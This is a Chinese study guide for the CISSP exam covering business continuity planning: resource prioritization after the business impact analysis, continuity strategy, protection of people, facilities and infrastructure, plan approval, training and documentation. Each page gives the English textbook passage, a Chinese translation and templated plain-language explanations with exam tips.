你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 253 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

BCP 保护业务流程,DRP 保护 IT 恢复。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
学习单元 22 / PDF P254

第 254 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Resource Prioritization The final step of the BIA is to prioritize the allocation of business continuity resources to the various risks that you identified and assessed in earlier phases of the BIA. From a quantitative point of view, this process is relatively straightforward. You simply create a list of all the risks you analyzed during the BIA process and sort them in descending order according to the ALE computed during the impact analysis phase. This step provides you with a prioritized list of the risks that you should address. Select as many items as you're willing and able to handle simultaneously from the top of the list and work your way down.

Eventually, you'll reach a point at which you've exhausted either the list of risks (unlikely) or all your available resources (much more likely). Recall from the previous section that we also stressed the importance of addressing qualitatively important concerns. In earlier sections about the BIA, we treated quantitative and qualitative analyses as mainly separate functions with some overlap. Now it's time to merge the two prioritized lists, which is more of an art than a science. You must sit down with the BCP team and representatives from the senior management team and combine the two lists into a single prioritized list.

Qualitative concerns may justify elevating or lowering the priority of risks that already exist on the ALE-sorted quantitative list. For example, if you run a fire suppression company, your number-one priority might be the prevention of a fire in your principal place of business even though an earthquake might cause more physical damage. The potential loss of reputation within the business community resulting from the destruction of a fire suppression company by fire might be too challenging to overcome and result in the eventual collapse of the business, justifying the increased priority.

Continuity Planning The first two phases of the BCP process (project scope and planning and business impact analysis) focus on determining how the BCP process will work and prioritizing the business assets that you must protect against interruption. The next phase of the BCP development, continuity planning, focuses on developing and implementing a continuity strategy to minimize the impact realized risks might have on protected assets.

中文直译 / 整理

资源优先级排序 业务影响分析的最后一步是,根据你在BIA前期阶段识别和评估的各种风险, 优先分配业务连续性资源。 从定量角度来看,这个过程相对直接。 您只需创建一份在BIA过程中分析的所 有风险的列表,并根据影响分析阶段计算出的ALE值按降序排列。 此步骤为您 提供了一份需要处理的风险优先级列表。 从列表顶部选择您愿意并能够同时处 理的项目,然后逐项向下处理。 最终,您将到达一个节点,此时您要么已耗尽 所有风险(不太可能),要么已耗尽所有可用资源(更有可能)。 回想前一节,我们还强调了处理定性重要问题的重要性。 在之前关于BIA的章 节中,我们将定量分析和定性分析视为主要独立的功能,仅有一些重叠。 现在 是时候将这两个优先级列表合并了,这更像是一门艺术而非科学。 您必须与 BCP团队以及高级管理层代表坐下来,将两个列表合并为一个单一的优先级列 表。 定性考量可能使已存在于ALE排序的定量列表中的风险优先级上调或下调。 例 如,如果您经营一家消防公司,您的首要任务可能是防止您主要营业场所发生 火灾,即使地震可能造成更大的物理损害。

火灾导致消防公司被毁而引发的商 业声誉损失可能过于难以克服,最终导致企业倒闭,因此有必要提高该风险的 优先级。 业务连续性规划 BCP过程的前两个阶段(项目范围和规划以及业务影响分析)旨在确定 BCP过程的工作方式,并优先保护那些必须防范中断的业务资产。 BCP开发 的下一阶段——连续性规划,则专注于制定和实施连续性策略,以最大限度 地减少潜在风险对受保护资产造成的影响。

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 254 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

BCP 保护业务流程,DRP 保护 IT 恢复。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
学习单元 23 / PDF P255

第 255 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Two primary subtasks are involved in continuity planning: Strategy development Provisions and processes In this section, you'll learn about both strategy development and the provisions and processes that are essential in continuity planning. The goal of this process is to create a continuity of operations plan (COOP). The continuity of operations plan focuses on how an organization will carry out critical business functions beginning shortly after a disruption occurs and extending for up to one month of sustained operations. Strategy Development Strategy development bridges the gap between the business impact analysis and the continuity planning elements of BCP development.

The BCP team must now take the prioritized list of concerns raised by the quantitative and qualitative resource prioritization exercises and determine which risks will be addressed by the business continuity plan. Fully addressing all the contingencies would require the implementation of provisions and processes that maintain a zero-downtime posture in the face of every possible risk. For obvious reasons, implementing a policy this comprehensive is impossible. The BCP team should look back to the MTD estimates created during the early stages of the BIA and determine which risks are deemed acceptable and which must be mitigated by BCP continuity provisions.

Some of these decisions are obvious—the risk of a blizzard striking an operations facility in Egypt is negligible and constitutes an acceptable risk. The risk of a monsoon in New Delhi is severe enough that BCP provisions must mitigate it. Each of these risk assessments includes cost considerations. It's normally only appropriate to mitigate a risk if the cost of mitigation is less than the expected cost of the risk itself. Once the BCP team determines which risks require mitigation and the level of resources that will be committed to each mitigation task, they are ready to move on to provisions and processes.

Provisions and Processes The provisions and processes subtask of continuity planning is the meat of the entire business continuity plan. In this subtask, the BCP team designs the

中文直译 / 整理

连续性规划涉及两个主要子任务: 战略制定 条款与流程 在本节中,您将了解战略制定以及连续性规划中必不可少的条款与流程。 该过 程的目标是创建一个 业务连续性计划(COOP)。 业务连续性计划着重于组织 在中断发生后不久如何开展关键业务职能,并持续长达一个月的稳定运营。 战略制定 战略制定弥合了业务影响分析与BCP开发中的连续性规划要素之间的差距。 BCP团队现在必须根据定量和定性资源优先级排序练习所提出的优先级列表, 确定哪些风险将由业务连续性计划应对。 全面应对所有应急情况需要实施能够 应对每种潜在风险的零停机措施。 出于明显的原因,实施如此全面的政策是不 可能的。 BCP团队应回顾BIA早期阶段创建的MTD估算值,确定哪些风险被视为可接受, 哪些必须由BCP连续性条款加以缓解。 其中一些决策显而易见——例如,暴风雪 袭击埃及运营设施的风险微乎其微,属于可接受风险; 而德里季风的风险则十 分严重,必须通过BCP条款加以缓解。 每项风险评估都包含成本考量。 通常情 况下,只有当缓解成本低于风险本身预期成本时,才应实施风险缓解措施。

一旦BCP团队确定了哪些风险需要缓解以及将为每个缓解任务投入的资源水平, 他们就可以进入条款和流程阶段。 条款和流程 连续性计划的条款与流程子任务是整个业务连续性计划的核心。 在此子任务中, BCP团队设计了

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

政策:政策是高层原则,说明必须遵守什么。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 255 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

Policy 高层、强制、稳定;Procedure 具体步骤。

BCP 保护业务流程,DRP 保护 IT 恢复。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
政策 政策是高层原则,说明必须遵守什么。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
学习单元 24 / PDF P256

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

specific procedures and mechanisms that will mitigate the risks deemed unacceptable during the strategy development subtask. Three categories of assets must be protected through BCP provisions and processes: people, buildings/facilities, and infrastructure. In the next three sections, we'll explore some of the techniques you can use to safeguard these categories. People First, you must ensure that the people within your organization are safe before, during, and after an emergency. Once you've achieved that goal, you must make provisions to allow your employees to conduct both their BCP and operational tasks in as normal a manner as possible, given the circumstances.

Don't lose sight of the fact that people are your most valuable asset. The safety of people must always come before the organization's business goals. Make sure that your business continuity plan makes adequate provisions for the security of your employees, customers, suppliers, and any other individuals who may be affected. Management should provide team members with all the resources they need to complete their assigned tasks. At the same time, if circumstances dictate that people be present in the workplace for extended periods, arrangements must be made for shelter and food.

Any continuity plan that requires these provisions should include detailed instructions for the BCP team in the event of a disaster. The organization should maintain stockpiles of provisions sufficient to feed the operational and support groups for an extended time in an accessible location. Plans should specify the periodic rotation of those stockpiles to prevent spoilage. Buildings and Facilities Many businesses require specialized facilities to carry out their critical operations. These might include standard office facilities, manufacturing plants, operations centers, warehouses, distribution/logistics centers, and repair/maintenance depots, among others.

When you perform your BIA, you will identify those facilities that play a critical role in your organization's continued viability. Your continuity plan should address two areas for each critical facility:

中文直译 / 整理

在策略开发子任务中被认定为不可接受的风险的特定程序和机制。 必须通过 BCP的条款与流程保护三类资产:人员、建筑物/设施和基础设施。 在接下 来的三个部分中,我们将探讨一些可用于保护这些类别的技术。 人员 首先,您必须确保在紧急情况发生前、发生时和发生后,您组织内的人员安全。 在实现这一目标后,您必须做出安排,使员工能够在给定条件下尽可能正常地 执行其业务连续性计划和运营任务。 不要忽视人员是您最宝贵的资产这一事实。 人员的安全必须始终优 先于组织的业务目标。 确保您的业务连续性计划为员工、客户、供应商 以及任何可能受到影响的其他人员提供充分的安全保障。 管理层应为团队成员提供完成其分配任务所需的一切资源。 同时,如果情况要 求人员在工作场所长时间停留,必须安排住宿和饮食。 任何需要这些保障的连 续性计划都应包含灾难发生时向业务连续性团队提供的详细指导。 组织应在易 于访问的地点储备充足的物资,以长期满足运营和支持团队的需求。 计划应明 确规定定期轮换这些储备物资,以防止变质。 建筑物与设施 许多企业需要专门的设施来开展其关键业务。

这些设施可能包括标准办公场所、 制造工厂、运营中心、仓库、分销/物流中心以及维修/维护基地等。 在进行业 务影响分析(BIA)时,您将识别出对组织持续运营至关重要的设施。 您的业 务连续性计划应针对每个关键设施涵盖以下两个方面:

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

日志要保护完整性、时间同步和访问控制。

BCP 保护业务流程,DRP 保护 IT 恢复。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
日志 日志记录系统和用户活动,用于监控、审计和调查。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
学习单元 25 / PDF P257

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

Hardening Provisions Your BCP should outline mechanisms and procedures that can be put in place to protect your existing facilities against the risks defined in the strategy development phase. Hardening provisions might include steps as simple as patching a leaky roof or as complex as installing reinforced hurricane shutters and fireproof walls. Alternate Sites If it's not feasible to harden a facility against a risk, your BCP should identify alternate site(s) where business activities can resume immediately (or at least in a time that's shorter than the maximum tolerable downtime for all affected critical business functions).

Chapter 18 describes a few of the facility types that might be useful in this stage. Typically, an alternate site is associated with disaster recovery planning (DRP) rather than BCP. The organization might identify the need for an alternate site during BCP development, but it takes an actual interruption to trigger the use of the site, making it fall under the DRP. Infrastructure Every business depends on some sort of infrastructure for its critical processes. For many companies, a vital part of this infrastructure is an IT backbone of communications and computer systems that process orders, manage the supply chain, handle customer interaction, and perform other business functions.

This backbone consists of servers, workstations, and critical communications links between sites. The BCP must address how the organization will protect these systems against risks identified during the strategy development phase. As with buildings and facilities, there are two main methods of providing this protection: Physically Hardening Systems You can protect systems against the risks by introducing protective measures such as electronic-friendly fire suppression systems and uninterruptible power supplies.

Alternative Systems You can also protect business functions by introducing redundancy (either redundant components or completely redundant systems/communications links that rely on different facilities). These same principles apply to whatever infrastructure components serve your critical business processes—transportation systems, electrical power grids, banking and financial systems, water supplies, and so on.

中文直译 / 整理

加固措施您的业务连续性计划(BCP)应明确可采取的机制和程序,以保 护现有设施免受战略开发阶段所定义风险的影响。 加固措施可能包括从修 补漏水的屋顶到安装加固的飓风百叶窗和防火墙等简单或复杂的步骤。 备用站点 如果无法加固设施以应对风险,您的业务连续性计划(BCP)应 识别出可以立即(或至少在所有受影响的关键业务功能的最大可容忍停机 时间之内)恢复业务活动的备用站点。 第18章 描述了在此阶段可能有用的 几种设施类型。 通常,备用站点与灾难恢复计划(DRP)相关,而非 BCP。 组织在BCP开发过程中可能会识别出对备用站点的需求,但只有在 实际中断发生时才会启用该站点,因此它属于DRP的范畴。 基础设施 每个企业都依赖某种基础设施来支持其关键流程。 对许多公司而言,这一基 础设施的重要组成部分是IT骨干网络,包括通信和计算机系统,用于处理订 单、管理供应链、处理客户交互以及其他业务功能。 该骨干网络由服务器、 工作站以及站点之间的关键通信链路组成。 BCP必须说明组织将如何在策略 开发阶段识别的风险中保护这些系统。

与建筑物和设施类似,提供这种保护 主要有两种方法: 物理硬化系统您可以通过引入保护措施,如电子友好型灭火系统和不间断电 源,来保护系统免受风险。 备用系统您还可以通过引入冗余(例如冗余组件或完全冗余的系统/通信 链路,这些依赖于不同的设施)来保护业务功能。 这些相同的原则适用于服务于关键业务流程的任何基础设施组件——交通运 输系统、电力网络、银行和金融系统、供水系统等。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

程序:程序是一步一步怎么做。

防火墙:防火墙根据规则控制网络流量进出。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

检测是 IDS,主动阻断更像 IPS。

BCP 保护业务流程,DRP 保护 IT 恢复。

RTO 是多久恢复,RPO 是能丢多少数据。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
灾难恢复计划 DRP DRP 关注 IT 系统、数据和基础设施如何恢复。
学习单元 26 / PDF P258

第 258 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

As organizations move many of their technology operations to the cloud, this doesn't reduce their reliance on physical infrastructure. Although the company may no longer operate the infrastructure themselves, they still rely on the physical infrastructure of their cloud service providers and should take measures to ensure they are comfortable with the level of continuity planning conducted by those providers. A disruption at a key cloud provider that affects one of the organization's own critical business functions can be just as damaging as a failure of the organization's own infrastructure.

Plan Approval and Implementation Once the BCP team completes the design phase of the BCP document, it's time to gain top-level management endorsement of the plan. If you have had senior management involvement throughout the development phases of the plan, this should be a relatively straightforward process. On the other hand, if this is your first time approaching management with the BCP document, you should be prepared to provide a lengthy explanation of the plan's purpose and specific provisions. Senior management buy-in is essential to the success of the overall BCP effort.

Plan Approval If possible, you should attempt to have the plan endorsed by the top executive in your business—the chief executive officer, chairperson, president, or similar business leader. This move demonstrates the importance of the plan to the entire organization and showcases the business leader's commitment to business continuity. The signature of such an individual on the plan also gives it much greater weight and credibility in the eyes of other senior managers, who might otherwise brush it off as a necessary but trivial IT initiative. Plan Implementation Once you've received approval from senior management, it's time to dive in and start implementing your plan.

The BCP team should get together and

中文直译 / 整理

随着组织将大量技术运营迁移到云端,这并不会减少他们对物理基础设施的依 赖。 尽管公司可能不再自行运营这些基础设施,但他们仍依赖于云服务提供商 的物理基础设施,并应采取措施确保他们对这些提供商所进行的连续性规划水 平感到满意。 关键云服务提供商的中断若影响到组织自身的关键业务功能,其 破坏性可能与组织自身基础设施的故障一样严重。 计划审批与实施 一旦BCP团队完成BCP文档的设计阶段,就到了获得高层管理对计划的批准之 时。 如果您在计划的各个开发阶段都已让高级管理层参与其中,这一过程应当 相对顺利。 另一方面,如果这是您首次向管理层提交BCP文档,则应准备好对 计划的目的和具体条款进行详尽的解释。 高级管理层的支持对于BCP整体工作的成功至关重要。 计划审批 如果可能,您应争取由贵公司最高级别的 executives——首席执行官、董事长、 总裁或类似的企业领导者——批准该计划。 此举向整个组织表明了该计划的重要 性,并展示了企业领导者对业务连续性的承诺。 这样一位人物在计划上的签名, 也将赋予计划更大的分量和可信度,使其他高级经理不会将其视为一项必要但 微不足道的IT举措。

计划实施 一旦获得高级管理层的批准,就该着手实施您的计划了。 BCP团队应集合起来

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 258 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

BCP 保护业务流程,DRP 保护 IT 恢复。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 27 / PDF P259

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

develop an implementation schedule that utilizes the resources dedicated to the program to achieve the stated process and provision goals in as prompt a manner as possible, given the scope of the modifications and the organization's attitude toward continuity planning. After fully deploying resources, the BCP team should supervise the design and implementation of a BCP maintenance program. This program ensures that the plan remains responsive to evolving business needs. Communication, Training and Education Communication, training and education are essential elements of the BCP implementation.

All personnel who will be involved in the plan (either directly or indirectly) should receive some sort of training on the overall plan, as well as their individual responsibilities. These responsibilities should be clearly communicated to everyone involved. Everyone in the organization should receive at least a plan overview briefing. These briefings provide employees with the confidence that business leaders have considered the possible risks posed to the continued operation of the business and have put a plan in place to mitigate the impact on the organization should a disruption occur.

People with direct BCP responsibilities should be trained and evaluated on their specific BCP tasks to ensure that they can complete them efficiently when disaster strikes. Furthermore, at least one backup person should be trained for every BCP task to provide redundancy in the event personnel are injured or cannot reach the workplace during an emergency. BCP Documentation Documentation is a critical step in the business continuity planning process.

Committing your BCP methodology to paper provides several significant benefits: It ensures that BCP personnel have a written continuity document to reference in the event of an emergency, even if senior BCP team members are not present to guide the effort. It provides a historical record of the BCP process that will be useful to future personnel seeking to both understand the reasoning behind various procedures and implement necessary changes in the plan.

中文直译 / 整理

制定一份实施时间表,充分利用为本项目分配的资源,尽可能迅速地实现既定 的流程和保障目标,同时考虑修改的范围以及组织对业务连续性规划的态度。 在完全部署资源后,BCP团队应监督BCP维护计划的设计与实施。 该计划确 保计划能够应对不断变化的业务需求。 沟通、培训与教育 沟通、培训与教育是BCP实施的关键要素。 所有参与计划的人员(无论是直接 还是间接参与)都应接受有关整体计划及其个人职责的培训。 这些职责应明确 传达给所有相关人员。 组织中的每个人都应至少接受一次计划概要简报。 这些简报使员工确信,业务 领导者已考虑了可能影响业务持续运营的潜在风险,并已制定计划以减轻突发 事件对组织造成的影响。 承担直接BCP职责的人员应接受其特定BCP任务的培训与评估,以确保在灾 难发生时能够高效完成任务。 此外,每个BCP任务都应至少培训一名备份人 员,以便在紧急情况下人员受伤或无法到达工作场所时提供冗余保障。 BCP 文档 文档是业务连续性规划过程中的关键步骤。 将您的BCP方法论书面化可带来若 干重要优势: 它确保BCP人员在紧急情况下即使没有高级BCP团队成员在现场指导, 也能参考书面的连续性文档。

它提供了BCP流程的历史记录,有助于未来人员理解各项程序背后的理 由并实施必要的计划变更。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

BCP 保护业务流程,DRP 保护 IT 恢复。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
学习单元 28 / PDF P260

第 260 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

It forces the team members to commit their thoughts to paper—a process that often facilitates the identification of flaws in the plan. Having the plan on paper also allows draft documents to be distributed to individuals not on the BCP team for a “sanity check.” In the following sections, we'll explore some of the essential components of the written business continuity plan. Continuity Planning Goals First, the plan should describe the goals of continuity planning as set forth by the BCP team and senior management. These goals should be decided on at or before the first BCP team meeting and will most likely remain unchanged throughout the life of the BCP.

The most common goal of the BCP is quite simple: to ensure the continuous operation of the business in the face of an emergency. Other goals may also be inserted in this section of the document to meet organizational needs. For example, you might have an objective that your customer call center experiences no more than 15 consecutive minutes of downtime or that your backup servers be able to handle 75 percent of your processing load within one hour of activation. Statement of Importance The statement of importance reflects the criticality of the BCP to the organization's continued viability.

This document commonly takes the form of a letter to the organization's employees, stating the reason that the organization devoted significant resources to the BCP development process and requesting the cooperation of all personnel in the BCP implementation phase. Here's where the importance of senior executive buy-in comes into play. If you can put out this letter under the signature of the chief executive officer (CEO) or an officer at a similar level, the plan will carry tremendous weight as you attempt to implement changes throughout the organization.

If you have the signature of a lower-level manager, you may encounter resistance as you try to work with portions of the organization outside of that individual's direct control. Statement of Priorities

中文直译 / 整理

它迫使团队成员将想法付诸纸面——这一过程通常有助于发现计划中的缺 陷。 将计划写在纸上还允许将草稿分发给BCP团队以外的人员进行“合理 性检查”。 在以下章节中,我们将探讨书面业务连续性计划的一些关键组成部分。 连续性规划目标 首先,该计划应描述BCP团队和高级管理层所设定的连续性规划目标。 这些目 标应在BCP团队第一次会议时或之前确定,并且在BCP的整个生命周期中很可 能保持不变。 BCP最常见的目标非常简单:确保在紧急情况下业务的持续运营。 为满足组织 需求,也可在本节中加入其他目标。 例如,您可能设定的目标是客户呼叫中心 的停机时间不超过连续15分钟,或在启动后一小时内,备份服务器能够处理 75%的处理负载。 重要性声明 重要性声明反映了BCP对组织持续生存的关键性。 该文件通常以一封致组织 员工的信件形式呈现,说明组织为何投入大量资源用于BCP的开发过程,并 请求所有员工在BCP实施阶段给予配合。 在这里,高层管理人员的支持变得至关重要。 如果您能以首席执行官(CEO) 或同等级别官员的名义发布这封信,那么在试图在整个组织内实施变革时,该 计划将具有极大的分量。

如果您仅获得较低级别经理的签名,在试图与该个人 直接管辖范围之外的组织部分合作时,可能会遇到阻力。 优先事项声明

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 260 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

BCP 保护业务流程,DRP 保护 IT 恢复。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
学习单元 29 / PDF P261

第 261 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

The statement of priorities flows directly from the identifying priorities phase of the business impact analysis. It simply involves listing the functions considered critical to continued business operations in a prioritized order. When listing these priorities, you should also include a statement that they were developed as part of the BCP process and reflect the importance of the functions to continued business operations in the event of an emergency and nothing more. Otherwise, the list of priorities could be used for unintended purposes and result in a political turf battle between competing organizations to the detriment of the business continuity plan.

